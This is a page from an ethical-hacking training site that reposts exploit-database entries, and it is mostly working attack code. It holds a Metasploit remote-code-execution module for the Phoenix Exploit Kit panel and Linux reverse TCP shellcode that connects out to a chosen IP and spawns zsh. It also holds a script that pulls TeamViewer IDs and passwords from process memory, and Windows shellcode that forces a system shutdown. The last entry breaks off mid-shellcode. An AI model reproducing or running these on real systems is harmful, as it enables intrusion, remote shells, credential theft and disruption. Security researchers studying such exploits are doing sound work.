Sadik Shaikh | CEH V9 | ETHICAL HACKING Course Training Institute in India-Pune

Phoenix Exploit Kit Remote Code Execution Exploit -- Hack the Hackers Unknown rwxr-xr-x 0 9/12/2016 Exploit

Filename	Phoenix Exploit Kit Remote Code Execution Exploit -- Hack the Hackers
Permission	rw-r--r--
Author	Unknown
Date and Time	9/12/2016
Label	Exploit
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India

Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Full title	Phoenix Exploit Kit Remote Code Execution Exploit
Date add	23-08-2016
Category	remote exploits
Platform	php
Risk	Security Risk Critical

Description:

This Metasploit module exploits a remote code execution in the web panel of Phoenix Exploit Kit via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => 'Phoenix Exploit Kit Remote Code Execution',

'Description' => %q{

This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via the geoip.php. The

Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the

presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which

then silently installs malware.

'License' => MSF_LICENSE,

'Privileged' => false,

'Payload' =>

{

'Space' => 200,

'DisableNops' => true,

'Compat' =>

{

'PayloadType' => 'cmd'

}

'Platform' => %w{ unix win },

'Arch' => ARCH_CMD,

'Targets' =>

[

['Phoenix Exploit Kit / Unix', { 'Platform' => 'unix' } ],

['Phoenix Exploit Kit / Windows', { 'Platform' => 'win' } ]

'DisclosureDate' => 'Jul 01 2016',

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The path of geoip.php which is vulnerable to RCE', '/Phoenix/includes/geoip.php']),

],self.class)

end

def check

test = Rex::Text.rand_text_alpha(8)

res = http_send_command("echo #{test};")

if res && res.body.include?(test)

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def exploit

encoded = Rex::Text.encode_base64(payload.encoded)

http_send_command("passthru(base64_decode(\"#{encoded}\"));")

end

def http_send_command(cmd)

send_request_cgi({

'method' => 'GET',

'uri' => normalize_uri(target_uri.path),

'vars_get' => {

'bdr' => cmd

}

})

end

www.extremehacking.org

Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Linux/x86 - zsh Reverse TCP Shellcode port 9090 Unknown rwxr-xr-x 0 9/10/2016 Exploit

Filename	Linux/x86 - zsh Reverse TCP Shellcode port 9090
Permission	rw-r--r--
Author	Unknown
Date and Time	9/10/2016
Label	Exploit
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Full title	Linux/x86 - zsh Reverse TCP Shellcode port 9090 - 80 bytes
Date add	11-08-2016
Category	shellcode
Platform	linux/x86
Risk	Security Risk High

global _start

section .text

_start:

xor eax, eax ; cleaning registers

xor ebx, ebx

; 1 - create socket

; socket(AF_INET, SOCK_STREAM, 0);

; #define SYS_SOCKET 1 // sys_socket(2)

push eax ; null terminate

push byte 0x1 ; stack = 0, 1

push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)

mov al, 0x66 ; sys_socketcall = 102

mov bl, 0x1 ; socketcall() socket = 1

mov ecx, esp ; mv stack ptr into ecx

int 0x80 ; init

xchg esi, eax ; saving sockfd

; 2 - Connect

; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

mov al, 0x66 ; sys_socketcall = 102

add ebx, 0x2 ; sys_connect = 3

push 0xefffff7f ; 127.255.255.254 (ip2shell.py)

push word 0x8223 ; 9090 (port2shell.py)

push word 0x2 ; 2 AF_INET

mov ecx, esp ; mv stack ptr to ecx

push 0x10 ; addr leght 16

push ecx ; ptr address

push esi ; fd

mov ecx, esp ; mv final stack ptr to ecx

int 0x80 ; init

xchg eax, esi ; save sockfd

; 3 - dup

; sys_dup2 = 63 = 0x3f

xor ecx, ecx ; NULL ecx

add cl, 0x2 ; add 2 to counter

dup2: ; STDIN, STDOUT, STDERR

mov al, 0x3f ; sys_dup2

int 0x80 ; init

dec cl ; decrement counter

jns dup2 ; Jump on No Sign (Positive)

; 4 - execve /bin/zsh

; normal execve shell exec

push eax ; null

push 0x68737a2f ; hsz/

push 0x6e69622f ; nib/

mov ebx, esp ; mv stack ptr to ebx

push eax ; null

push ebx ; push ptr addr

mov ecx, esp ; mv new stack ptr to ecx

mov al, 0xb ; sys_execve (11)

int 0x80 ; init

============================================================================================================

No NULL

./reverse-zsh-tcp-9090.bin: file format elf32-i386

Disassembly of section .text:

08048060 <_start>:

8048060: 31 c0 xor %eax,%eax

8048062: 31 db xor %ebx,%ebx

8048064: 50 push %eax

8048065: 6a 01 push $0x1

8048067: 6a 02 push $0x2

8048069: b0 66 mov $0x66,%al

804806b: b3 01 mov $0x1,%bl

804806d: 89 e1 mov %esp,%ecx

804806f: cd 80 int $0x80

8048071: 96 xchg %eax,%esi

8048072: b0 66 mov $0x66,%al

8048074: 83 c3 02 add $0x2,%ebx

8048077: 68 7f ff ff ef push $0xefffff7f

804807c: 66 68 23 82 pushw $0x8223

8048080: 66 6a 02 pushw $0x2

8048083: 89 e1 mov %esp,%ecx

8048085: 6a 10 push $0x10

8048087: 51 push %ecx

8048088: 56 push %esi

8048089: 89 e1 mov %esp,%ecx

804808b: cd 80 int $0x80

804808d: 96 xchg %eax,%esi

804808e: 31 c9 xor %ecx,%ecx

8048090: 80 c1 02 add $0x2,%cl

08048093 <dup2>:

8048093: b0 3f mov $0x3f,%al

8048095: cd 80 int $0x80

8048097: fe c9 dec %cl

8048099: 79 f8 jns 8048093 <dup2>

804809b: 50 push %eax

804809c: 68 2f 7a 73 68 push $0x68737a2f

80480a1: 68 2f 62 69 6e push $0x6e69622f

80480a6: 89 e3 mov %esp,%ebx

80480a8: 50 push %eax

80480a9: 53 push %ebx

80480aa: 89 e1 mov %esp,%ecx

80480ac: b0 0b mov $0xb,%al

80480ae: cd 80 int $0x80

#include<stdio.h>

#include<string.h>

unsigned char code[] = \

"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1
\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"

// Replace IP here (use ip2shell.py to generate IP).

"\x7f\xff\xff\xef"

// *****************

"\x66\x68"

// Replace port here (use port2shell.py to generate IP).

"\x23\x82"

// *****************

"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96
\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50
\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53
\x89\xe1\xb0\x0b\xcd\x80"

main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

www.extremehacking.org

TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit Unknown rwxr-xr-x 0 9/09/2016 Exploit

Filename	TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Permission	rw-r--r--
Author	Unknown
Date and Time	9/09/2016
Label	Exploit
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India

Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Full titleTeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure Exploit
Date add08-09-2016
Categorylocal exploits
Platformwindows
Risk
Security Risk High

#####

# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process.

# There is no need in privilege account access. Credentials are stored in context of regular user.

# A potential attacker could reveal the supplied username and password automatically and gain persistent access to host via TeamViewer services.

#

# Proof-Of-Concept Code:

#####

from winappdbg import Debug, Process, HexDump

import sys

import re

filename = 'TeamViewer.exe'

def memory_search( pid ):

        found = []

        # Instance a Process object.

        process = Process( pid )

        # Search for the string in the process memory.

        # Looking for User ID:

        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'

        for address in process.search_regexp( userid_pattern ):

                 found += [address]

        print 'Possible UserIDs found:'

        found = [i[-1] for i in found]

        for i in set(found):

           print i.replace('\x00','')

        found = []

        # Looking for Password:

        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'

        for address in process.search_regexp( pass_pattern ):

                 found += [process.read(address[0]-3,16)]

        if found:

            print '\nPassword:'

        if len(found) > 1:

            s = list(set([x for x in found if found.count(x) > 1]))

            for i in s:

               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]

            print pwd

        else:

            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]

        return found

debug = Debug()

try:

        # Lookup the currently running processes.

        debug.system.scan_processes()

        # For all processes that match the requested filename...

        for ( process, name ) in debug.system.find_processes_by_filename( filename ):

                pid = process.get_pid()

        memory_search(pid)

finally:

        debug.stop()

www.extremehacking.org

Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Windows/x86 - InitiateSystemShutdownA() Shellcode Unknown rwxr-xr-x 0 9/09/2016 Exploit

Filename	Windows/x86 - InitiateSystemShutdownA() Shellcode
Permission	rw-r--r--
Author	Unknown
Date and Time	9/09/2016
Label	Exploit
Action

Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India

Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

Full title	Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)
Date add	18-08-2016
Category	shellcode
Platform	win32
Risk	Security Risk High

/*
# Title: Windows x86 InitiateSystemShutdownA() shellcode
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7 x86 starter
*/


/*
Disassembly of section .text:

00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx

00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 89 cf mov %ecx,%edi
4d: 31 c0 xor %eax,%eax
4f: 50 push %eax
50: 83 ec 1c sub $0x1c,%esp
53: 8d 34 24 lea (%esp),%esi
56: 89 16 mov %edx,(%esi)
58: 50 push %eax
59: 68 6f 6b 65 6e push $0x6e656b6f
5e: 68 65 73 73 54 push $0x54737365
63: 68 50 72 6f 63 push $0x636f7250
68: 68 4f 70 65 6e push $0x6e65704f
6d: 8d 04 24 lea (%esp),%eax
70: 50 push %eax
71: 51 push %ecx
72: ff d2 call *%edx
74: 89 46 04 mov %eax,0x4(%esi)
77: 83 c4 10 add $0x10,%esp
7a: 31 c9 xor %ecx,%ecx
7c: 68 73 41 42 42 push $0x42424173
81: 88 4c 24 01 mov %cl,0x1(%esp)
85: 68 6f 63 65 73 push $0x7365636f
8a: 68 6e 74 50 72 push $0x7250746e
8f: 68 75 72 72 65 push $0x65727275
94: 68 47 65 74 43 push $0x43746547
99: 8d 0c 24 lea (%esp),%ecx
9c: 51 push %ecx
9d: 57 push %edi
9e: 8b 16 mov (%esi),%edx
a0: ff d2 call *%edx
a2: 83 c4 14 add $0x14,%esp
a5: 89 46 08 mov %eax,0x8(%esi)
a8: 31 c9 xor %ecx,%ecx
aa: 68 65 73 73 41 push $0x41737365
af: 88 4c 24 03 mov %cl,0x3(%esp)
b3: 68 50 72 6f 63 push $0x636f7250
b8: 68 45 78 69 74 push $0x74697845
bd: 8d 0c 24 lea (%esp),%ecx
c0: 51 push %ecx
c1: 57 push %edi
c2: 8b 16 mov (%esi),%edx
c4: ff d2 call *%edx
c6: 83 c4 0c add $0xc,%esp
c9: 89 46 0c mov %eax,0xc(%esi)
cc: 31 c9 xor %ecx,%ecx
ce: 51 push %ecx
cf: 68 61 72 79 41 push $0x41797261
d4: 68 4c 69 62 72 push $0x7262694c
d9: 68 4c 6f 61 64 push $0x64616f4c
de: 8d 0c 24 lea (%esp),%ecx
e1: 51 push %ecx
e2: 57 push %edi
e3: 8b 16 mov (%esi),%edx
e5: ff d2 call *%edx
e7: 83 c4 0c add $0xc,%esp
ea: 68 2e 64 6c 6c push $0x6c6c642e
ef: 68 70 69 33 32 push $0x32336970
f4: 68 61 64 76 61 push $0x61766461
f9: 8d 0c 24 lea (%esp),%ecx
fc: 51 push %ecx
fd: ff d0 call *%eax
ff: 83 c4 0c add $0xc,%esp
102: 89 c7 mov %eax,%edi
104: 31 c9 xor %ecx,%ecx
106: 68 41 42 42 42 push $0x42424241
10b: 88 4c 24 01 mov %cl,0x1(%esp)
10f: 68 61 6c 75 65 push $0x65756c61
114: 68 65 67 65 56 push $0x56656765
119: 68 69 76 69 6c push $0x6c697669
11e: 68 75 70 50 72 push $0x72507075
123: 68 4c 6f 6f 6b push $0x6b6f6f4c
128: 8d 0c 24 lea (%esp),%ecx
12b: 51 push %ecx
12c: 50 push %eax
12d: 8b 16 mov (%esi),%edx
12f: ff d2 call *%edx
131: 83 c4 18 add $0x18,%esp
134: 89 46 10 mov %eax,0x10(%esi)
137: 31 c9 xor %ecx,%ecx
139: 68 73 41 41 41 push $0x41414173
13e: 88 4c 24 01 mov %cl,0x1(%esp)
142: 68 6c 65 67 65 push $0x6567656c
147: 68 72 69 76 69 push $0x69766972
14c: 68 6b 65 6e 50 push $0x506e656b
151: 68 73 74 54 6f push $0x6f547473
156: 68 41 64 6a 75 push $0x756a6441
15b: 8d 0c 24 lea (%esp),%ecx
15e: 51 push %ecx
15f: 57 push %edi
160: 8b 16 mov (%esi),%edx
162: ff d2 call *%edx
164: 83 c4 18 add $0x18,%esp
167: 89 46 14 mov %eax,0x14(%esi)
16a: 31 c9 xor %ecx,%ecx
16c: 68 77 6e 41 42 push $0x42416e77
171: 88 4c 24 03 mov %cl,0x3(%esp)
175: 68 75 74 64 6f push $0x6f647475
17a: 68 65 6d 53 68 push $0x68536d65
17f: 68 53 79 73 74 push $0x74737953
184: 68 69 61 74 65 push $0x65746169
189: 68 49 6e 69 74 push $0x74696e49
18e: 8d 0c 24 lea (%esp),%ecx
191: 51 push %ecx
192: 57 push %edi
193: 8b 16 mov (%esi),%edx
195: ff d2 call *%edx
197: 83 c4 18 add $0x18,%esp
19a: 89 46 18 mov %eax,0x18(%esi)
19d: 31 c0 xor %eax,%eax
19f: 50 push %eax
1a0: 83 ec 14 sub $0x14,%esp
1a3: 8d 3c 24 lea (%esp),%edi

000001a6 <proc_start>:
1a6: 8b 46 08 mov 0x8(%esi),%eax
1a9: ff d0 call *%eax
1ab: 31 d2 xor %edx,%edx
1ad: 8d 17 lea (%edi),%edx
1af: 52 push %edx
1b0: 31 c9 xor %ecx,%ecx
1b2: b1 28 mov $0x28,%cl
1b4: 51 push %ecx
1b5: 50 push %eax
1b6: 8b 4e 04 mov 0x4(%esi),%ecx
1b9: ff d1 call *%ecx
1bb: 8d 57 04 lea 0x4(%edi),%edx
1be: 8d 52 04 lea 0x4(%edx),%edx
1c1: 8d 12 lea (%edx),%edx
1c3: 31 c9 xor %ecx,%ecx
1c5: 68 65 67 65 41 push $0x41656765
1ca: 88 4c 24 03 mov %cl,0x3(%esp)
1ce: 68 69 76 69 6c push $0x6c697669
1d3: 68 77 6e 50 72 push $0x72506e77
1d8: 68 75 74 64 6f push $0x6f647475
1dd: 68 53 65 53 68 push $0x68536553
1e2: 8d 0c 24 lea (%esp),%ecx
1e5: 31 db xor %ebx,%ebx
1e7: 52 push %edx
1e8: 51 push %ecx
1e9: 53 push %ebx
1ea: 8b 5e 10 mov 0x10(%esi),%ebx
1ed: ff d3 call *%ebx
1ef: 8d 57 04 lea 0x4(%edi),%edx
1f2: 31 c9 xor %ecx,%ecx
1f4: 41 inc %ecx
1f5: 89 0a mov %ecx,(%edx)
1f7: 8d 52 04 lea 0x4(%edx),%edx
1fa: 41 inc %ecx
1fb: 89 4a 08 mov %ecx,0x8(%edx)
1fe: 31 d2 xor %edx,%edx
200: 52 push %edx
201: 52 push %edx
202: 52 push %edx
203: 8d 57 04 lea 0x4(%edi),%edx
206: 52 push %edx
207: 31 d2 xor %edx,%edx
209: 52 push %edx
20a: 8b 17 mov (%edi),%edx
20c: 52 push %edx
20d: 8b 56 14 mov 0x14(%esi),%edx
210: ff d2 call *%edx
212: 31 c9 xor %ecx,%ecx
214: 51 push %ecx
215: 68 6e 64 73 21 push $0x2173646e
21a: 68 73 65 63 6f push $0x6f636573
21f: 68 41 20 33 20 push $0x20332041
224: 68 6d 2e 45 54 push $0x54452e6d
229: 68 79 73 74 65 push $0x65747379
22e: 68 6e 67 20 53 push $0x5320676e
233: 68 61 72 74 49 push $0x49747261
238: 68 52 65 73 74 push $0x74736552
23d: 8d 1c 24 lea (%esp),%ebx
240: 41 inc %ecx
241: 51 push %ecx
242: 31 c9 xor %ecx,%ecx
244: 51 push %ecx
245: b1 03 mov $0x3,%cl
247: 51 push %ecx
248: 53 push %ebx
249: 31 c9 xor %ecx,%ecx
24b: 51 push %ecx
24c: 8b 4e 18 mov 0x18(%esi),%ecx
24f: ff d1 call *%ecx
251: 8b 4e 0c mov 0xc(%esi),%ecx
254: 50 push %eax
255: ff d1 call *%ecx


*/



/*
HANDLE 4 bytes
TOKEN_PRIVILEGES 16 bytes

TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 40
LUID_AND_ATTRIBUTES 12 bytes
LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
SE_PRIVILEGE_ENABLED = 2


required functions:

1. WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
2. WINBASEAPI HANDLE WINAPI GetCurrentProcess (VOID);

3. WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4. WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5. WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);

6.GetProcAddress()
7.ExitProcess()
8.LoadLibraryA() [1 time use]



required dll:

1.kernel32.dll
2.kernel32.dll

3.advapi32.dll
4.advapi32.dll
5.advapi32.dll

6.kernel32.dll
7.kernel32.dll
8.kernel32.dll


required macro and custom data types:


#define ANYSIZE_ARRAY 1


typedef struct _TOKEN_PRIVILEGES {
DWORD PrivilegeCount;
LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES,*PTOKEN_PRIVILEGES;


typedef struct _LUID_AND_ATTRIBUTES {
LUID Luid;
DWORD Attributes;
} LUID_AND_ATTRIBUTES,*PLUID_AND_ATTRIBUTES;
typedef LUID_AND_ATTRIBUTES LUID_AND_ATTRIBUTES_ARRAY[ANYSIZE_ARRAY];
typedef LUID_AND_ATTRIBUTES_ARRAY *PLUID_AND_ATTRIBUTES_ARRAY;



typedef struct _LUID {
DWORD LowPart;
LONG HighPart;
} LUID,*PLUID;


c code:


#include <windows.h>
#include<stdio.h>
#include<process.h>
#include<io.h>

int main(){
HANDLE h;
TOKEN_PRIVILEGES t;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
return 0;




LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&t.Privileges[0].Luid);
t.PrivilegeCount=1;
t.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;



AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);

InitiateSystemShutdown(NULL,"shutting",10,FALSE,1);
}
*/

/*
section .text
global _start
_start:

xor ecx,ecx

mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll base address


mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY


mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx

xor edx,edx

g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g


mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx

mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()

mov edi,ecx ;kernel32.dll

xor eax,eax
push eax
sub esp,28

lea esi,[esp]

mov [esi],dword edx ;GetProcAddress() at offset 0


;---------------------------------
;finding address of OpenProcessToken()

push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f

lea eax,[esp]
push eax
push ecx

call edx
;-----------------------------------
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10
;-------------------------

;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547


lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
;-------------------------
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8
;----------------------------------

;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845

lea ecx,[esp]

push ecx
push edi
mov edx,dword [esi]
call edx
;-----------------------
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12
;-------------------------------------------

;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
;--------------------
add esp,12

;LoadLibraryA("advapi32.dll")
push 0x6c6c642e
push 0x32336970
push 0x61766461

lea ecx,[esp]
push ecx
call eax
;--------------------------
add esp,12
mov edi,eax ; advapi32.dll
;------------------------------
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c


lea ecx,[esp]
push ecx
push eax

mov edx,dword [esi]
call edx

;---------------------------
add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16
;-------------------------

;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
;------------------------------------
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20
;---------------------------

;finding address of InitiateSystemShutdownA()

xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49


lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
;-------------------------
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24
;-------------------------

xor eax,eax
push eax


sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address


;---------------------------------
;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24

;----------------------------------------



proc_start:

;---------------------------
;GetCurrentProcess()

mov eax,[esi+8]
call eax

;----------------------------
;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&HANDLE)

xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40

push ecx
push eax

mov ecx,[esi+4]
call ecx

;--------------------------
;LookupPrivilegeValueA(NULL,SE_SHUTDOWN_NAME,&TOKEN_PRIVILEGES.Privileges[0].Luid);

lea edx,[edi+4]
lea edx,[edx+4]


lea edx,[edx]

xor ecx,ecx

push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553

lea ecx,[esp]


xor ebx,ebx


push edx
push ecx
push ebx

mov ebx,[esi+16]
call ebx
;----------------------------------
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx

xor edx,edx
push edx
push edx
push edx

lea edx,[edi+4]
push edx

xor edx,edx
push edx

mov edx,dword [edi]

push edx

mov edx,[esi+20]
call edx

;----------------------------
;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);

xor ecx,ecx


;--------------------------
push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552


lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"
;------------------------------

inc ecx ;if U want to shutdown system , just remove this line

push ecx

xor ecx,ecx
push ecx

mov cl,3 ;3 seconds
push ecx
push ebx
xor ecx,ecx
push ecx


mov ecx,[esi+24]
call ecx

;--------------------------
;Exiting
mov ecx,[esi+12]
push eax
call ecx
*/


#include<stdio.h>
#include<string.h>
char shellcode[]=\

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xcf\x31\xc0\x50\x83\xec\x1c\x8d\x34\x24\x89\x16\x50\x68\x6f\x6b\x65\x6e\x68\x65\x73\x73\x54\x68\x50\x72\x6f\x63\x68\x4f\x70\x65\x6e\x8d\x04\x24\x50\x51\xff\xd2\x89\x46\x04\x83\xc4\x10\x31\xc9\x68\x73\x41\x42\x42\x88\x4c\x24\x01\x68\x6f\x63\x65\x73\x68\x6e\x74\x50\x72\x68\x75\x72\x72\x65\x68\x47\x65\x74\x43\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x14\x89\x46\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x68\x2e\x64\x6c\x6c\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x61\x6c\x75\x65\x68\x65\x67\x65\x56\x68\x69\x76\x69\x6c\x68\x75\x70\x50\x72\x68\x4c\x6f\x6f\x6b\x8d\x0c\x24\x51\x50\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x10\x